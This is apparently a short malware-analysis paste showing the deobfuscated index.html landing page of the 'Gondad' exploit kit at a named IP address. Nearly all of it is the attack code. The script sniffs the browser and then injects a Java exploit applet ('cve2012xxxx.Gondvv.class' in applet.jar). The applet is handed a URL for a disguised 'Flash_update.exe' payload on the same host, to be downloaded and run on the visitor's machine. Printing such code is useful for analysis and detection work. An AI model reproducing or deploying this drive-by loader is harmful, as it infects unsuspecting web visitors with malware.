62.152.104.149 index.html deobfuscated code

1. -----------------------------------------------------------
2. Deobfuscated index.html is also part of Gondad exploit kit on 62.152.104.149
3. -----------------------------------------------------------
4.  
5. NjJPKK2 = fqIjwRI5;
6.     wxhrsnl4 = GkJcUMJ3(20100418);
7.     while (window.closed) {
8.     }
9.     var xxx3 = window.navigator.userAgent.toLowerCase();
10.     if (xxx3.indexOf("msie 6") > -1) {
11.         document.write("<OBJECT classid='clsid:8AD9C840-044E-11D1-B3E9-00805F499D93' width='200' height='200'><param name=xiaomaolv value= 'http://62.152.104.149/public/meeting/Flash_update.exe'><param name=bn value= 'woyouyizhixiaomaolv'><param name=si value= 'conglaiyebuqi'><param name=bs value= '748'><param name=CODE value= 'cve2012xxxx.Gondvv.class'><param name=archive value= 'applet.jar'></OBJECT>");
12.     } else {
13.         document.write("<br>");
14.         var gondady = document.createElement("body");
15.         document.body.appendChild(gondady);
16.         var gondad = document.createElement("applet");
17.         gondad.width = "256";
18.         gondad.height = "256";
19.         gondad.archive = "applet.jar";
20.         gondad.code = "cve2012xxxx.Gondvv.class";
21.         gondad.setAttribute("xiaomaolv", "http://62.152.104.149/public/meeting/Flash_update.exe");
22.         gondad.setAttribute("bn", "woyouyizhixiaomaolv");
23.         gondad.setAttribute("si", "conglaiyebuqi");
24.         gondad.setAttribute("bs", "748");
25.         document.body.appendChild(gondad);
26.     }